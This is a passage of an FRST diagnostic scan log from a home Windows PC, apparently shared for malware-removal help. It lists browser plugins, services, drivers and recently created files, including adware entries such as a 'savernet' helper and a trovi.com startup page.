BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: savernet -> {f1bf4d17-a17e-4311-ba3a-ec4384e7ee35} -> C:\ProgramData\savernet\sDW70t8VQ2RNoZ.dll No File
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll (McAfee, Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1

FireFox:
========
FF ProfilePath: C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\1hcaal8x.default
FF SearchEngineOrder.3: Bing
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_15_0_0_223.dll ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_223.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-638231278-2563524819-3576094203-1001: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Nick\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll (Coupons, Inc.)
FF Extension: ArcadeYum - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\1hcaal8x.default\Extensions\{C7928956-827D-4649-A234-BB758377C005}.xpi [2014-10-20]
FF Extension: Term Tutor - C:\Program Files (x86)\Mozilla Firefox\extensions\[email protected] [2014-09-24]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-09-24]
FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2013-11-17]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR StartupUrls: Default -> "hxxp://www.trovi.com/?gd=&ctid=CT3330389&octid=EB_ORIGINAL_CTID&ISID=M7BB70274-6B99-4688-B46C-0E1CA51F6087&SearchSource=55&CUI=&UM=6&UP=SPC0F8B4F2-3D31-425F-BF6E-6B56E5390FD1&SSPV="
CHR DefaultSuggestURL: Default -> http://suggest.secci...ix={searchTerms}
CHR Profile: C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [226944 2012-12-28] (Qualcomm Atheros Commnucations)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 CouponPrinterService; C:\PROGRAM FILES (X86)\COUPONS\COUPONPRINTERSERVICE.EXE [177136 2014-04-28] (Coupons.com Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
R3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [44032 2013-08-21] (Microsoft Corporation)
S3 lfsvc; C:\Windows\SysWOW64\GeofenceMonitorService.dll [357376 2014-03-14] (Microsoft Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [178528 2014-01-28] (McAfee, Inc.)
S3 McAWFwk; C:\Program Files\Common Files\mcafee\ActWiz\McAWFwk.exe [334760 2012-12-21] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [602944 2013-08-02] (McAfee, Inc.)
R2 McOobeSv2; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [1025712 2014-01-21] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [219752 2014-01-27] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [185792 2014-01-27] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [328928 2013-07-30] (McAfee, Inc.)
S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [688640 2014-03-06] (Microsoft Corporation)
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [254512 2012-04-24] ()
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [246488 2013-06-18] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [1915480 2013-05-23] (SoftThinks SAS)
S3 smphost; C:\Windows\SysWOW64\smphost.dll [11776 2013-08-21] (Microsoft Corporation)
S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18944 2013-08-21] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347880 2014-03-23] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2014-03-23] (Microsoft Corporation)
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2012-12-26] (Atheros)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2012-12-28] (Qualcomm Atheros)
R3 BthLEEnum; C:\Windows\System32\drivers\BthLEEnum.sys [226304 2013-12-04] (Microsoft Corporation)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [70592 2014-01-27] (McAfee, Inc.)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
S3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2013-01-24] (OSR Open Systems Resources, Inc.)
S3 ElgatoGC658Y; C:\Windows\System32\Drivers\ElgatoGC658.sys [50288 2012-11-12] (UB658)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.)
S3 ManyCam; C:\Windows\system32\DRIVERS\mcvidrv.sys [49776 2014-05-13] (Visicom Media Inc.)
S3 mcaudrv_simple; C:\Windows\system32\drivers\mcaudrv_x64.sys [35440 2014-05-13] (Visicom Media Inc.)
R2 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [180272 2014-01-27] (McAfee, Inc.)
R2 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [311600 2014-01-27] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [69352 2014-01-27] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [520696 2014-01-27] (McAfee, Inc.)
R2 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [783864 2014-01-27] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys [422712 2014-01-21] (McAfee, Inc.)
S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [96592 2014-01-21] (McAfee, Inc.)
R2 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [344688 2014-01-27] (McAfee, Inc.)
S3 PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [47632 2013-04-29] (Panda Security, S.L.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [28040 2012-12-21] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [32136 2012-12-21] (Synaptics Incorporated)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123224 2014-03-23] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-12 14:19 - 2014-11-12 14:20 - 00033514 _____ () C:\Users\Nick\Desktop\FRST.txt
2014-11-12 14:18 - 2014-11-12 14:19 - 00000000 ____D () C:\FRST
2014-11-12 14:18 - 2014-11-12 14:18 - 02116096 _____ (Farbar) C:\Users\Nick\Desktop\FRST64.exe
2014-11-12 14:18 - 2014-11-12 14:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2014-11-12 14:14 - 2014-11-12 14:14 - 00008012 _____ () C:\Users\Nick\Desktop\AdwCleaner[S1].txt
2014-11-12 14:14 - 2014-11-12 14:14 - 00000000 ___RD () C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-11-12 14:09 - 2014-11-12 14:09 - 00000512 _____ () C:\Users\Nick\Desktop\MBR.dat
2014-11-12 13:59 - 2014-11-12 14:09 - 00002447 _____ () C:\Users\Nick\Desktop\aswMBR.txt
2014-11-12 13:39 - 2014-11-12 13:39 - 00053248 _____ () C:\WINDOWS\SysWOW64\zlib.dll
2014-11-12 13:39 - 2014-11-12 13:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Foolish IT
2014-11-12 13:39 - 2014-11-12 13:39 - 00000000 ____D () C:\ProgramData\Foolish IT
2014-11-12 13:38 - 2014-11-12 13:38 - 00000000 ____D () C:\Program Files (x86)\Foolish IT
2014-11-12 13:27 - 2014-11-12 13:27 - 00069002 _____ () C:\Users\Nick\Downloads\Extras.Txt
2014-11-12 13:25 - 2014-11-12 13:25 - 00320696 _____ () C:\Users\Nick\Downloads\OTL.Txt
2014-11-12 12:49 - 2014-11-12 12:49 - 00602112 _____ (OldTimer Tools) C:\Users\Nick\Downloads\OTL.exe
2014-11-12 09:20 - 2014-11-12 09:20 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(5).exe
2014-11-12 09:18 - 2014-11-12 09:19 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(4).exe
2014-11-12 09:16 - 2014-11-12 09:16 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(3).exe
2014-11-12 08:58 - 2014-11-12 08:59 - 00942608 _____ (SaferInstall, LLC) C:\Users\Nick\Downloads\adobeflashplayerinstaller_setup.exe
2014-11-11 20:33 - 2014-11-11 20:33 - 00750440 _____ () C:\Users\Nick\Downloads\Setup(2).exe
2014-11-11 20:31 - 2014-11-11 20:32 - 00081264 _____ (Premium Installer ) C:\Users\Nick\Downloads\setup(1).exe
2014-11-11 13:54 - 2014-11-11 13:54 - 02140160 _____ () C:\Users\Nick\Downloads\adwcleaner_4.101.exe
2014-11-11 13:50 - 2014-11-11 13:50 - 00000303 _____ () C:\Users\Nick\Desktop\Control Panel.lnk
2014-11-09 09:32 - 2014-11-09 09:32 - 04055840 _____ (Download Freely, LLC ) C:\Users\Nick\Downloads\MPlayer [1].exe
2014-11-09 09:32 - 2014-11-09 09:32 - 00722824 _____ ( ) C:\Users\Nick\Downloads\MPlayer.exe
2014-10-27 09:55 - 2014-10-27 09:55 - 00000000 ___RD () C:\Users\Nick\Documents\Notes
2014-10-23 18:33 - 2014-10-23 18:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-10-23 18:27 - 2014-10-23 18:27 - 00001797 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-10-23 18:27 - 2014-10-23 18:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-10-23 18:26 - 2014-10-23 18:27 - 00000000 ____D () C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
2014-10-23 18:26 - 2014-10-23 18:27 - 00000000 ____D () C:\Program Files\iTunes
2014-10-23 18:26 - 2014-10-23 18:27 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-10-23 18:26 - 2014-10-23 18:26 - 00000000 ____D () C:\Program Files\iPod
2014-10-23 18:17 - 2014-10-24 05:52 - 00000000 ____D () C:\Users\Nick\AppData\Local\LogMeIn Rescue Applet
2014-10-23 18:17 - 2014-10-23 18:17 - 01244480 _____ (LogMeIn, Inc.) C:\Users\Nick\Downloads\Support-LogMeInRescue.exe
2014-10-23 18:17 - 2014-10-23 18:17 - 00002264 _____ () C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Asurion Insurance Services.lnk
2014-10-22 19:25 - 2014-11-11 10:44 - 00000000 ____D () C:\Users\Nick\AppData\Local\Spotify
2014-10-22 19:25 - 2014-10-22 19:25 - 00001850 _____ () C:\Users\Nick\Desktop\Spotify.lnk
2014-10-22 19:25 - 2014-10-22 19:25 - 00001836 _____ () C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2014-10-22 19:24 - 2014-11-11 14:45 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Spotify
2014-10-22 19:24 - 2014-10-22 19:24 - 00137888 _____ (Spotify Ltd) C:\Users\Nick\Downloads\SpotifySetup.exe
2014-10-17 20:15 - 2014-11-11 14:01 - 00003448 _____ () C:\WINDOWS\System32\Tasks\ISpeedPC_LogOn
2014-10-15 18:08 - 2014-09-03 19:10 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\winbici.dll
2014-10-15 18:08 - 2014-09-03 18:57 - 00921600 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2014-10-15 18:08 - 2014-09-03 18:49 - 00626688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2014-10-15 18:07 - 2014-10-09 17:16 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepdu.dll
2014-10-15 18:07 - 2014-10-08 17:09 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2014-10-15 18:07 - 2014-09-18 20:24 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2014-10-15 18:07 - 2014-09-13 01:02 - 02779648 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2014-10-15 18:07 - 2014-09-13 00:30 - 03117568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2014-10-15 18:07 - 2014-08-28 20:58 - 00109568 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
2014-10-15 18:07 - 2014-08-28 18:56 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2014-10-15 18:07 - 2014-08-28 18:47 - 02321920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2014-10-15 05:05 - 2014-09-27 17:25 - 04183040 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2014-10-15 05:04 - 2014-09-07 22:15 - 00054752 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2014-10-15 05:04 - 2014-09-07 20:46 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2014-10-15 05:04 - 2014-09-07 20:46 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2014-10-15 05:04 - 2014-09-07 19:08 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2014-10-15 05:04 - 2014-09-07 19:07 - 00137728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2014-10-15 05:04 - 2014-09-07 19:05 - 03448320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2014-10-15 05:04 - 2014-09-07 19:04 - 00388608 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2014-10-15 05:04 - 2014-09-07 19:04 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2014-10-15 05:04 - 2014-09-07 19:03 - 01702400 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2014-10-15 05:04 - 2014-09-07 19:03 - 00839680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2014-10-15 05:04 - 2014-09-07 18:59 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2014-10-15 05:04 - 2014-09-07 18:59 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2014-10-15 05:04 - 2014-09-07 18:56 - 00672256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2014-10-15 05:04 - 2014-09-07 18:56 - 00080896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2014-10-15 05:03 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2014-10-15 05:03 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2014-10-15 05:03 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2014-10-15 05:03 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2014-10-15 05:03 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2014-10-15 05:03 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2014-10-15 05:03 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2014-10-15 05:03 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2014-10-15 05:03 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2014-10-15 05:03 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2014-10-15 05:03 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2014-10-15 05:03 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2014-10-15 05:03 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2014-10-15 05:03 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2014-10-15 05:03 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2014-10-15 05:03 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2014-10-15 05:03 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2014-10-15 05:03 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2014-10-15 05:03 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2014-10-15 05:03 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2014-10-15 05:03 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2014-10-15 05:03 - 2014-09-18 19:42 - 00363008 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2014-10-15 05:03 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2014-10-15 05:03 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2014-10-15 05:03 - 2014-09-18 19:20 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2014-10-15 05:03 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2014-10-15 05:03 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2014-10-15 05:03 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2014-10-15 05:03 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2014-10-15 05:03 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2014-10-15 05:03 - 2014-09-13 01:29 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\packager.dll
2014-10-15 05:03 - 2014-09-13 00:49 - 00068608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\packager.dll
2014-10-15 05:03 - 2014-09-03 19:12 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2014-10-15 05:03 - 2014-09-03 19:01 - 00514048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2014-10-15 05:03 - 2014-08-15 23:08 - 21195616 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2014-10-15 05:03 - 2014-08-15 23:08 - 01507648 _____ (Microsoft Corporation) C:\WINDOWS\system32\propsys.dll
2014-10-15 05:03 - 2014-08-15 23:01 - 01710184 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2014-10-15 05:03 - 2014-08-15 22:58 - 01112512 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2014-10-15 05:03 - 2014-08-15 22:57 - 02498880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2014-10-15 05:03 - 2014-08-15 22:57 - 00428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2014-10-15 05:03 - 2014-08-15 22:16 - 18722600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2014-10-15 05:03 - 2014-08-15 22:16 - 01205976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\propsys.dll
2014-10-15 05:03 - 2014-08-15 22:03 - 01467384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2014-10-15 05:03 - 2014-08-15 20:31 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2014-10-15 05:03 - 2014-08-15 20:04 - 00359424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll
2014-10-15 05:03 - 2014-08-15 19:58 - 00287744 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerServer.dll
2014-10-15 05:03 - 2014-08-15 19:53 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\httpprxm.dll
2014-10-15 05:03 - 2014-08-15 19:46 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityService.dll
2014-10-15 05:03 - 2014-08-15 19:45 - 00267776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2014-10-15 05:03 - 2014-08-15 19:43 - 00321024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll
2014-10-15 05:03 - 2014-08-15 19:43 - 00075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\adhsvc.dll
2014-10-15 05:03 - 2014-08-15 19:31 - 00914432 _____ (Microsoft Corporation) C:\WINDOWS\system32\iphlpsvc.dll
2014-10-15 05:03 - 2014-08-15 19:31 - 00286208 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcsvDevice.dll
2014-10-15 05:03 - 2014-08-15 19:29 - 00249344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2014-10-15 05:03 - 2014-08-15 19:23 - 01106432 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFolder.dll
2014-10-15 05:03 - 2014-08-15 19:22 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SkyDriveTelemetry.dll
2014-10-15 05:03 - 2014-08-15 19:22 - 00286208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SkyDriveShell.dll
2014-10-15 05:03 - 2014-08-15 19:19 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2014-10-15 05:03 - 2014-08-15 19:18 - 04758528 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncEngine.dll
2014-10-15 05:03 - 2014-08-15 19:17 - 08757760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2014-10-15 05:03 - 2014-08-15 19:14 - 00265216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SkyDriveShell.dll
2014-10-15 05:03 - 2014-08-15 19:13 - 06649344 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2014-10-15 05:03 - 2014-08-15 19:13 - 05902848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2014-10-15 05:03 - 2014-08-15 19:13 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFolder.dll
2014-10-15 05:03 - 2014-08-15 19:11 - 00920064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSShared.dll
2014-10-15 05:03 - 2014-08-15 19:10 - 01120768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SkyDrive.exe
2014-10-15 05:03 - 2014-08-15 19:08 - 05777408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2014-10-15 05:03 - 2014-08-15 19:07 - 00756224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSShared.dll
2014-10-15 05:03 - 2014-07-31 18:22 - 00388729 _____ () C:\WINDOWS\system32\ApnDatabase.xml

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

